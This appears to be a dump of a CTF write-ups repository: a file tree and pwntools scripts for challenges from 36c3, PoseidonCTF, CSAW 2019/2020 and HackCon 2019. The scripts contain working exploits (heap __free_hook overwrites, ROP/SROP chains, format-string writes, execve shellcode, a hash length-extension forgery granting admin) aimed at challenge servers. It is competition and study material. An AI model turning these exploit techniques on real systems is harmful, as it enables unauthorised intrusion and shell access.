├── 36c3 CTF └── pwn │ └── onetimepad │ ├── exploit.py │ └── onetimepad-3dacecfee0c81326.tar.xz ├── PoseidonCTF └── Oldnote │ ├── Oldnote.tar.gz │ ├── ld-2.32.so │ ├── libc-2.32.so │ └── solve.py ├── README.md ├── csaw2019 ├── RE │ └── beleaf │ │ ├── beleaf │ │ └── solve.py └── pwn │ ├── baby_boi │ ├── baby_boi │ ├── exploit.py │ └── libc-2.27.so │ ├── gotmilk │ ├── exploit.py │ ├── gotmilk │ └── libmylib.so │ ├── small_boi │ ├── exploit.py │ └── small_boi │ └── traveller │ ├── exploit.py │ └── traveller ├── csaw2020 ├── authy │ └── solve.py ├── grid │ └── grid.py ├── modus_operandi │ └── solve.py └── roppity │ └── exploit.py ├── hackcon2019 ├── crypto │ └── otp │ │ ├── README.md │ │ └── solve.py └── pwn │ ├── 2_small_2_pwn │ ├── .gdb_history │ ├── README.md │ ├── exploit.py │ └── q4 │ ├── Not_So_Easy_B0f │ ├── README.md │ ├── exploit.py │ ├── libc.so.6 │ └── q3 │ ├── babyb0f │ ├── README.md │ ├── exploit.py │ ├── libc.so.6 │ └── q1 │ └── babypwn │ ├── README.md │ ├── exploit.py │ └── q2 ├── inctf2020 └── Lab9 │ ├── .gdb_history │ ├── add.sh │ ├── bzImage │ ├── exploit │ ├── exploit.c │ ├── exploit_modprobe_path │ ├── exploit_modprobe_path.c │ ├── extract-vmlinux │ ├── fs │ ├── bin │ │ ├── [ │ │ ├── [[ │ │ ├── acpid │ │ ├── add-shell │ │ ├── addgroup │ │ ├── adduser │ │ ├── adjtimex │ │ ├── arp │ │ ├── arping │ │ ├── ash │ │ ├── awk │ │ ├── base64 │ │ ├── basename │ │ ├── beep │ │ ├── blkid │ │ ├── blockdev │ │ ├── bootchartd │ │ ├── brctl │ │ ├── bunzip2 │ │ ├── busybox │ │ ├── bzcat │ │ ├── bzip2 │ │ ├── cal │ │ ├── cat │ │ ├── catv │ │ ├── chat │ │ ├── chattr │ │ ├── chgrp │ │ ├── chmod │ │ ├── chown │ │ ├── chpasswd │ │ ├── chpst │ │ ├── chroot │ │ ├── chrt │ │ ├── chvt │ │ ├── cksum │ │ ├── clear │ │ ├── cmp │ │ ├── comm │ │ ├── conspy │ │ ├── cp │ │ ├── cpio │ │ ├── crond │ │ ├── crontab │ │ ├── cryptpw │ │ ├── cttyhack │ │ ├── cut │ │ ├── date │ │ ├── dc │ │ ├── dd │ │ ├── deallocvt │ │ ├── delgroup │ │ ├── deluser │ │ ├── depmod │ │ ├── devmem │ │ ├── df │ 
│ ├── dhcprelay │ │ ├── diff │ │ ├── dirname │ │ ├── dmesg │ │ ├── dnsd │ │ ├── dnsdomainname │ │ ├── dos2unix │ │ ├── du │ │ ├── dumpkmap │ │ ├── dumpleases │ │ ├── echo │ │ ├── ed │ │ ├── egrep │ │ ├── eject │ │ ├── env │ │ ├── envdir │ │ ├── envuidgid │ │ ├── ether-wake │ │ ├── expand │ │ ├── expr │ │ ├── fakeidentd │ │ ├── false │ │ ├── fbset │ │ ├── fbsplash │ │ ├── fdflush │ │ ├── fdformat │ │ ├── fdisk │ │ ├── fgconsole │ │ ├── fgrep │ │ ├── find │ │ ├── findfs │ │ ├── flock │ │ ├── fold │ │ ├── free │ │ ├── freeramdisk │ │ ├── fsck │ │ ├── fsck.minix │ │ ├── fsync │ │ ├── ftpd │ │ ├── ftpget │ │ ├── ftpput │ │ ├── fuser │ │ ├── getopt │ │ ├── getty │ │ ├── grep │ │ ├── groups │ │ ├── gunzip │ │ ├── gzip │ │ ├── halt │ │ ├── hd │ │ ├── hdparm │ │ ├── head │ │ ├── hexdump │ │ ├── hostid │ │ ├── hostname │ │ ├── httpd │ │ ├── hush │ │ ├── hwclock │ │ ├── id │ │ ├── ifconfig │ │ ├── ifdown │ │ ├── ifenslave │ │ ├── ifplugd │ │ ├── ifup │ │ ├── inetd │ │ ├── init │ │ ├── insmod │ │ ├── install │ │ ├── ionice │ │ ├── iostat │ │ ├── ip │ │ ├── ipaddr │ │ ├── ipcalc │ │ ├── ipcrm │ │ ├── ipcs │ │ ├── iplink │ │ ├── iproute │ │ ├── iprule │ │ ├── iptunnel │ │ ├── kbd_mode │ │ ├── kill │ │ ├── killall │ │ ├── killall5 │ │ ├── klogd │ │ ├── last │ │ ├── less │ │ ├── linux32 │ │ ├── linux64 │ │ ├── linuxrc │ │ ├── ln │ │ ├── loadfont │ │ ├── loadkmap │ │ ├── logger │ │ ├── login │ │ ├── logname │ │ ├── logread │ │ ├── losetup │ │ ├── lpd │ │ ├── lpq │ │ ├── lpr │ │ ├── ls │ │ ├── lsattr │ │ ├── lsmod │ │ ├── lsof │ │ ├── lspci │ │ ├── lsusb │ │ ├── lzcat │ │ ├── lzma │ │ ├── lzop │ │ ├── lzopcat │ │ ├── makedevs │ │ ├── makemime │ │ ├── man │ │ ├── md5sum │ │ ├── mdev │ │ ├── mesg │ │ ├── microcom │ │ ├── mkdir │ │ ├── mkdosfs │ │ ├── mke2fs │ │ ├── mkfifo │ │ ├── mkfs.ext2 │ │ ├── mkfs.minix │ │ ├── mkfs.vfat │ │ ├── mknod │ │ ├── mkpasswd │ │ ├── mkswap │ │ ├── mktemp │ │ ├── modinfo │ │ ├── modprobe │ │ ├── more │ │ ├── mount │ │ ├── mountpoint │ │ ├── mpstat │ │ 
├── mt │ │ ├── mv │ │ ├── nameif │ │ ├── nanddump │ │ ├── nandwrite │ │ ├── nbd-client │ │ ├── nc │ │ ├── netstat │ │ ├── nice │ │ ├── nmeter │ │ ├── nohup │ │ ├── nslookup │ │ ├── ntpd │ │ ├── od │ │ ├── openvt │ │ ├── passwd │ │ ├── patch │ │ ├── pgrep │ │ ├── pidof │ │ ├── ping │ │ ├── ping6 │ │ ├── pipe_progress │ │ ├── pivot_root │ │ ├── pkill │ │ ├── pmap │ │ ├── popmaildir │ │ ├── poweroff │ │ ├── powertop │ │ ├── printenv │ │ ├── printf │ │ ├── ps │ │ ├── pscan │ │ ├── pstree │ │ ├── pwd │ │ ├── pwdx │ │ ├── raidautorun │ │ ├── rdate │ │ ├── rdev │ │ ├── readahead │ │ ├── readlink │ │ ├── readprofile │ │ ├── realpath │ │ ├── reboot │ │ ├── reformime │ │ ├── remove-shell │ │ ├── renice │ │ ├── reset │ │ ├── resize │ │ ├── rev │ │ ├── rm │ │ ├── rmdir │ │ ├── rmmod │ │ ├── route │ │ ├── rpm │ │ ├── rpm2cpio │ │ ├── rtcwake │ │ ├── run-parts │ │ ├── runlevel │ │ ├── runsv │ │ ├── runsvdir │ │ ├── rx │ │ ├── script │ │ ├── scriptreplay │ │ ├── sed │ │ ├── sendmail │ │ ├── seq │ │ ├── setarch │ │ ├── setconsole │ │ ├── setfont │ │ ├── setkeycodes │ │ ├── setlogcons │ │ ├── setserial │ │ ├── setsid │ │ ├── setuidgid │ │ ├── sh │ │ ├── sha1sum │ │ ├── sha256sum │ │ ├── sha512sum │ │ ├── showkey │ │ ├── slattach │ │ ├── sleep │ │ ├── smemcap │ │ ├── softlimit │ │ ├── sort │ │ ├── split │ │ ├── start-stop-daemon │ │ ├── stat │ │ ├── strings │ │ ├── stty │ │ ├── su │ │ ├── sulogin │ │ ├── sum │ │ ├── sv │ │ ├── svlogd │ │ ├── swapoff │ │ ├── swapon │ │ ├── switch_root │ │ ├── sync │ │ ├── sysctl │ │ ├── syslogd │ │ ├── tac │ │ ├── tail │ │ ├── tar │ │ ├── tcpsvd │ │ ├── tee │ │ ├── telnet │ │ ├── telnetd │ │ ├── test │ │ ├── tftp │ │ ├── tftpd │ │ ├── time │ │ ├── timeout │ │ ├── top │ │ ├── touch │ │ ├── tr │ │ ├── traceroute │ │ ├── traceroute6 │ │ ├── true │ │ ├── tty │ │ ├── ttysize │ │ ├── tunctl │ │ ├── udhcpc │ │ ├── udhcpd │ │ ├── udpsvd │ │ ├── umount │ │ ├── uname │ │ ├── unexpand │ │ ├── uniq │ │ ├── unix2dos │ │ ├── unlzma │ │ ├── unlzop │ │ ├── unxz │ │ 
├── unzip │ │ ├── uptime │ │ ├── users │ │ ├── usleep │ │ ├── uudecode │ │ ├── uuencode │ │ ├── vconfig │ │ ├── vi │ │ ├── vlock │ │ ├── volname │ │ ├── wall │ │ ├── watch │ │ ├── watchdog │ │ ├── wc │ │ ├── wget │ │ ├── which │ │ ├── who │ │ ├── whoami │ │ ├── whois │ │ ├── xargs │ │ ├── xz │ │ ├── xzcat │ │ ├── yes │ │ ├── zcat │ │ └── zcip │ ├── exploit │ ├── exploit_modprobe_path │ ├── flag │ ├── home │ │ └── user │ │ │ └── root │ ├── init │ └── mod.ko │ ├── mod.ko │ ├── rootfs.cpio │ ├── start.sh │ └── vmlinux ├── picoctf └── 2019 │ └── pwn │ ├── sice_cream │ ├── exploit.py │ ├── libc-2.23.so │ └── sice_cream │ └── zero_to_hero │ ├── README.md │ ├── exploit.py │ ├── libc.so.6 │ └── zero_to_hero └── tctf └── chromium_rce ├── d8 ├── exploit.js ├── snapshot_blob.bin └── tctf.diff /36c3 CTF/pwn/onetimepad/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #Author: r4j 3 | 4 | from pwn import * 5 | from time import sleep 6 | 7 | context.terminal=['tmux','new-window'] 8 | e = ELF('./onetimepad') 9 | p = process('./onetimepad') 10 | #p = remote('88.198.154.140',31336) 11 | libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') 12 | 13 | def add(data): 14 | p.recvuntil('> ') 15 | p.sendline('w') 16 | sleep(0.2) 17 | p.sendline(data) 18 | 19 | def read(idx): 20 | p.recvuntil('> ') 21 | p.sendline('r') 22 | sleep(0.2) 23 | p.sendline(str(idx)) 24 | return p.recvline().strip() 25 | 26 | def edit(idx,data): 27 | p.recvuntil('> ') 28 | p.sendline('e') 29 | sleep(0.2) 30 | p.sendline(str(idx)) 31 | sleep(0.2) 32 | p.sendline(data) 33 | 34 | def junk(size): 35 | add('A'*size) 36 | 37 | add('\x00'*0x650) 38 | read(0) 39 | 40 | add('A'*8+p64(0x21)) #0 41 | add('A'*0x10) #1 00 42 | add('A'*0x10) #2 20 43 | add('A'*0x10) #3 40 44 | add('A'*0x10) #4 60 45 | add('A'*0x3a8+p64(0x21)) #5 80 46 | add('A'*8+p64(0x21)) 47 | 48 | read(3) 49 | read(4) 50 | 51 | edit(4,'') 52 | 53 | add('a') #3 54 | add('L'*8+p64(0x431)) #4 55 
| 56 | read(1) 57 | add('A'*0x10) #1 58 | add('/bin/sh;'+'A'*0x28) #7 59 | 60 | leak = u64(read(3).ljust(8,'\x00')) - 0x1bbca0 61 | log.info('libc leak: '+hex(leak)) 62 | libc.address = leak 63 | 64 | read(1) 65 | read(4) 66 | 67 | add('A'*0x10+p64(libc.symbols['__free_hook'])) 68 | add('a') 69 | add(p64(libc.symbols['system'])) 70 | 71 | read(7) 72 | p.interactive() 73 | -------------------------------------------------------------------------------- /36c3 CTF/pwn/onetimepad/onetimepad-3dacecfee0c81326.tar.xz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/36c3 CTF/pwn/onetimepad/onetimepad-3dacecfee0c81326.tar.xz -------------------------------------------------------------------------------- /PoseidonCTF/Oldnote/Oldnote.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/PoseidonCTF/Oldnote/Oldnote.tar.gz -------------------------------------------------------------------------------- /PoseidonCTF/Oldnote/ld-2.32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/PoseidonCTF/Oldnote/ld-2.32.so -------------------------------------------------------------------------------- /PoseidonCTF/Oldnote/libc-2.32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/PoseidonCTF/Oldnote/libc-2.32.so -------------------------------------------------------------------------------- /PoseidonCTF/Oldnote/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | e = ELF('./oldnote') 3 | libc = 
ELF('./libc-2.26.so') 4 | p = None 5 | 6 | def c(ch): 7 | p.sendafter(': ', str(ch)) 8 | 9 | def add(size, data): 10 | c(1) 11 | c(size) 12 | c(data) 13 | 14 | def free(idx): 15 | c(2) 16 | c(idx) 17 | 18 | def exploit(): 19 | global p 20 | #p = process('./oldnote', env = {"LD_PRELOAD":'./libc-2.26.so'}) 21 | p = remote('poseidonchalls.westeurope.cloudapp.azure.com', 9000) 22 | add(0x10, chr(ord('A'))*0x10) 23 | 24 | for i in range(3): 25 | add(0xff, chr(ord('A'))*0x10) 26 | 27 | for i in range(2,4): 28 | free(i) 29 | 30 | for i in range(2): 31 | add(0xef, chr(ord('A'))*0x10) 32 | 33 | free(0) 34 | add(-1, '\x00'*0x18+p64(0x421)+p64(0x21)*150) 35 | free(1) 36 | 37 | for i in range(4): 38 | free(i) 39 | 40 | add(0xf0, 'L') 41 | add(0xd0, 'L') 42 | add(0x30, 'L') 43 | add(0x30, p16(0x4720)) 44 | 45 | for i in range(3): 46 | free(i) 47 | 48 | add(0xff, 'L') 49 | try: 50 | add(0xff, p64(0xfbad1800) + 3*p64(0)+"\x00") 51 | leak = p.recv() 52 | if '\x7f' not in leak: 53 | print "No leak" 54 | p.close() 55 | return 56 | print leak 57 | except: 58 | print "No" 59 | p.close() 60 | return 61 | libc.address = u64(leak[leak.find('\x7f')-5:leak.find('\x7f')+1].ljust(8, '\x00'))-0x3d73e0 62 | log.success('Libc base: '+hex(libc.address)) 63 | p.sendline('') 64 | free(0) 65 | free(3) 66 | add(0x30, p64(libc.symbols['__free_hook'])) 67 | add(0x30, '/bin/sh\x00') 68 | add(0x30, p64(libc.symbols['system'])) 69 | free(2) 70 | p.interactive() 71 | exit() 72 | 73 | for i in range(16): 74 | exploit() 75 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ctf-writeups 2 | Ctf Writeups 3 | -------------------------------------------------------------------------------- /csaw2019/RE/beleaf/beleaf: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/csaw2019/RE/beleaf/beleaf -------------------------------------------------------------------------------- /csaw2019/RE/beleaf/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | values = [0x77,0x66,0x7b,0x5f,0x6e,0x79,0x7d,0xffffffff,0x62,0x6c,0x72,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0x61,0x65,0x69,0xffffffff,0x6f,0x74,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0x67,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0x75,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xfffffff
f,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0xffffffff,0x00] 3 | wanted = [0x01,0x09,0x11,0x27,0x02,0x00,0x12,0x03,0x08,0x12,0x09,0x12,0x11,0x01,0x03,0x13,0x04,0x03,0x05,0x15,0x2e,0x0a,0x03,0x0a,0x12,0x03,0x01,0x2e,0x16,0x2e,0x0a,0x12,0x06,] 4 | flag = '' 5 | 6 | for i in wanted: 7 | flag += chr(values[i]) 8 | 9 | print flag 10 | -------------------------------------------------------------------------------- /csaw2019/pwn/baby_boi/baby_boi: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/csaw2019/pwn/baby_boi/baby_boi -------------------------------------------------------------------------------- /csaw2019/pwn/baby_boi/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | from pwn import * 3 | 4 | e = ELF('./baby_boi') 5 | libc = ELF('./libc-2.27.so') 6 | p = remote('pwn.chal.csaw.io',1005) 7 | #p = process('./baby_boi') 8 | offset = 'A'*40 9 | p.recvline() 10 | leak = p.recvline() 11 | leak = int(leak[leak.find('0x'):].strip(),16) 12 | libc_base_address = leak-libc.symbols['printf'] 13 | p.sendline(offset+p64(0x4f322+libc_base_address)) #one_gadget 14 | p.interactive() 15 | -------------------------------------------------------------------------------- /csaw2019/pwn/baby_boi/libc-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/csaw2019/pwn/baby_boi/libc-2.27.so -------------------------------------------------------------------------------- /csaw2019/pwn/gotmilk/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | from pwn import * 3 | e = ELF('./gotmilk') 4 | lose = e.got['lose'] 5 | main = e.symbols['main'] 6 | printf = e.got['printf'] 7 | lib = ELF('./libmylib.so') 8 | p = remote('pwn.chal.csaw.io',1004) 9 | #p = process('./gotmilk') 10 | p.recvuntil('? 
') 11 | p.sendline(p32(0x804a010)+"%133c%7$hhn") 12 | p.interactive() 13 | -------------------------------------------------------------------------------- /csaw2019/pwn/gotmilk/gotmilk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/csaw2019/pwn/gotmilk/gotmilk -------------------------------------------------------------------------------- /csaw2019/pwn/gotmilk/libmylib.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/csaw2019/pwn/gotmilk/libmylib.so -------------------------------------------------------------------------------- /csaw2019/pwn/small_boi/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | from pwn import * 3 | e = ELF('./small_boi') 4 | #p = process('./small_boi') 5 | p = remote('pwn.chal.csaw.io',1002) 6 | context.arch="amd64" 7 | padding = "A"*40 8 | 9 | rw = 0x601000+100 10 | payload = padding + p64(0x40018a) + p64(rw) + p64(0x40018c) + p64(0x40018a) + p64(0xf) + p64(0x400185) 11 | 12 | shell = "/bin/sh\x00" 13 | frame = SigreturnFrame(kernel="amd64") 14 | frame.rax = 59 15 | frame.rdi = 0x4001ca 16 | frame.rsi = 0 17 | frame.rdx = 0 18 | frame.rsp = rw 19 | frame.rip = 0x400185 20 | payload += str(frame) 21 | payload += p64(rw) 22 | p.sendline(payload) 23 | __import__('time').sleep(0.5) 24 | p.sendline(shell) 25 | p.interactive() 26 | -------------------------------------------------------------------------------- /csaw2019/pwn/small_boi/small_boi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/csaw2019/pwn/small_boi/small_boi 
-------------------------------------------------------------------------------- /csaw2019/pwn/traveller/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | from pwn import * 3 | context(arch="amd64",os="linux",timeout=0.5) 4 | e = ELF('./traveller') 5 | #p = process('./traveller') 6 | p = remote('pwn.chal.csaw.io',1003) 7 | 8 | p.recvuntil('> ') 9 | p.sendline('1') #create 10 | p.recvuntil('> ') 11 | p.sendline('1') # malloc(0x80) 12 | p.recvuntil('Destination: ') 13 | p.sendline('/bin/sh') 14 | 15 | p.recvuntil('> ') 16 | p.sendline('2') 17 | p.recvuntil(': ') 18 | p.sendline('-262194') # __free_hook 19 | p.sendline(p64(e.symbols['system'])) #overwriting free hook with system 20 | 21 | p.recvuntil('>') 22 | p.sendline('3') 23 | p.recvuntil(': ') 24 | p.sendline('0') # trigerring __free_hook by calling free 25 | p.interactive() 26 | -------------------------------------------------------------------------------- /csaw2019/pwn/traveller/traveller: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/csaw2019/pwn/traveller/traveller -------------------------------------------------------------------------------- /csaw2020/authy/solve.py: -------------------------------------------------------------------------------- 1 | import hashpumpy, hashlib 2 | from requests import get, post 3 | host, port = 'crypto.chal.csaw.io', 5003 4 | def new(author, note): return post('http://{}:{}/new'.format(host, port).encode(), data={'author':author, 'note': note}).content.strip().split(' ')[2].split(':') 5 | def view(id, integrity): return post('http://{}:{}/view'.format(host, port), data={'id':id, 'integrity': integrity}).content 6 | secret_length = 13 7 | data = new('asd', 'asd') 8 | sig = hashpumpy.hashpump(data[1], data[0].decode('base64'), 
'&entrynum=7&admin=True&access_sensitive=True', secret_length) 9 | print (view(sig[1].replace('\x80', '\\x80').replace('\xe0', '\\xe0').encode('base64'), sig[0])) 10 | -------------------------------------------------------------------------------- /csaw2020/grid/grid.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | e = ELF('./grid') 3 | libc = e.libc 4 | #p = process(e.path, env = {'LD_PRELOAD':'./libstdc.so.6.0.25'}) 5 | p = remote('pwn.chal.csaw.io', 5013) 6 | idx = -85 7 | def do(char): 8 | global idx 9 | p.recvuntil('shape>', timeout=0.5) 10 | p.sendline(char) 11 | p.recvuntil('loc> ', timeout=0.5) 12 | p.sendline('5'+str(idx)) 13 | p.recvuntil('shape> ', timeout=0.5) 14 | p.sendline('d') 15 | idx -= 1 16 | 17 | p.sendlineafter('shape> ', 'd') 18 | leak = p.recv() 19 | libc.address = u64(leak[37:43] + "\x00"*2)-0x4ec5da 20 | log.succes('Libc leak: '+hex(libc.address)) 21 | pog = p64(libc.address+0x4f365)[::-1][2:] # one_gadget 22 | for i in pog: 23 | do(i) 24 | 25 | pause() 26 | for i in range(2): 27 | p.sendline('\x00') 28 | p.interactive() 29 | -------------------------------------------------------------------------------- /csaw2020/modus_operandi/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python2 2 | #unintended but works 3 | from pwn import remote 4 | r = remote('crypto.chal.csaw.io', 5001) 5 | def do(p, t): 6 | r.sendlineafter(':', p, timeout=1) 7 | r.sendlineafter('?', t) 8 | 9 | x = ['ECB', 'CBC'] 10 | a = [0] 11 | 12 | def con(): 13 | for i in a: 14 | do('d', x[i]) 15 | con() 16 | while 1: 17 | try: 18 | do('d', x[0]) 19 | a.append(0) 20 | except: 21 | a = a[:-1] 22 | a.append(1) 23 | flag = '' 24 | for i in range(0, len(a), 8): 25 | flag += chr(int(''.join([str(b) for b in a[i:i+8]]), 2)) 26 | print (flag) 27 | r = remote('crypto.chal.csaw.io', 5001) 28 | con() 29 | continue 30 | 31 | r.interactive() 32 | 
-------------------------------------------------------------------------------- /csaw2020/roppity/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | payload = 'A'*40 3 | context.arch='amd64' 4 | e = ELF('./rop') 5 | libc = ELF('./libc-2.27.so') 6 | #libc = e.libc 7 | #p = process(e.path) 8 | p = remote('pwn.chal.csaw.io', 5016) 9 | payload = 'A'*40 10 | r = ROP(e) 11 | r.puts(e.got['puts']) 12 | r.main() 13 | payload += r.chain() 14 | p.recvline() 15 | p.sendline(payload) 16 | leak = u64(p.recv(6).ljust(8,'\x00')) 17 | libc.address = leak-libc.symbols['puts'] 18 | print hex(libc.address) 19 | r = ROP(libc) 20 | r.system(libc.search('/bin/sh').next()) 21 | payload = 'A'*40 + r.chain() 22 | p.recvline() 23 | p.sendline(payload) 24 | p.interactive() 25 | -------------------------------------------------------------------------------- /hackcon2019/crypto/otp/README.md: -------------------------------------------------------------------------------- 1 | hackerman is so dank that he decided to play around with OTPs. 2 | he did the following: 3 | message1 ^ key = cipher1 4 | message2 ^ key = cipher2 5 | 6 | He gives you cipher1 and cipher2 and challenges you to find the concatenation of messages 1 and 2. 7 | Are you dank enough to find this? 8 | Oh and also, 'meme' is so popular that hackerman used the word in both his messages. 
9 | cipher1 is '\x05F\x17\x12\x14\x18\x01\x0c\x0b4' 10 | cipher2 is '>\x1f\x00\x14\n\x08\x07Q\n\x0e' 11 | Both without quotes 12 | -------------------------------------------------------------------------------- /hackcon2019/crypto/otp/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #flag format: d4rk{flag}c0de 3 | from pwn import xor 4 | c1 = '\x05F\x17\x12\x14\x18\x01\x0c\x0b4' 5 | c2 = '>\x1f\x00\x14\n\x08\x07Q\n\x0e' 6 | 7 | c = c1 + c2 8 | 9 | key1 = xor(c1[:5],'d4rk{') 10 | key2 = xor(c2[-5:],'}c0de') 11 | key = key1+key2 12 | 13 | print xor(c,key) #flag 14 | -------------------------------------------------------------------------------- /hackcon2019/pwn/2_small_2_pwn/.gdb_history: -------------------------------------------------------------------------------- 1 | info functions 2 | -------------------------------------------------------------------------------- /hackcon2019/pwn/2_small_2_pwn/README.md: -------------------------------------------------------------------------------- 1 | I just read and write , Can you still Pwn me ? 
2 | 3 | Service is running at nc 68.183.158.95 8992 4 | 5 | -------------------------------------------------------------------------------- /hackcon2019/pwn/2_small_2_pwn/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | #e = ELF('./q4') 3 | #p = process('./q4',stdin=PTY) 4 | p = remote('68.183.158.95',8992) 5 | payload = "A"*16 6 | payload += p64(0x600000+0x10) # rwxp 7 | payload += p64(0x4000c7) # main+8 8 | payload += "A"*(160-len(payload)) 9 | #payload += "AAAAAAAA"*5 10 | payload += p64(0x600030)*4 11 | payload += "A"*8*2 12 | payload += "4831f648c7c74400600048c7c03b000000990f05".decode('hex') #shellcode 13 | ''' 14 | xor rsi,rsi 15 | mov rdi,0x600044 16 | mov rax, 59 17 | cdq 18 | syscall 19 | ''' 20 | payload += "/bin/sh\x00" #shell 21 | p.sendline(payload) 22 | p.recv(10000) 23 | p.recv(10000,timeout=1) 24 | p.interactive() 25 | -------------------------------------------------------------------------------- /hackcon2019/pwn/2_small_2_pwn/q4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r4j0x00/ctf-writeups/aa13537192c6e9eba5e724d609403faee659ba5a/hackcon2019/pwn/2_small_2_pwn/q4 -------------------------------------------------------------------------------- /hackcon2019/pwn/Not_So_Easy_B0f/README.md: -------------------------------------------------------------------------------- 1 | I have stack canaries enabled, Can you still B0f me ? 
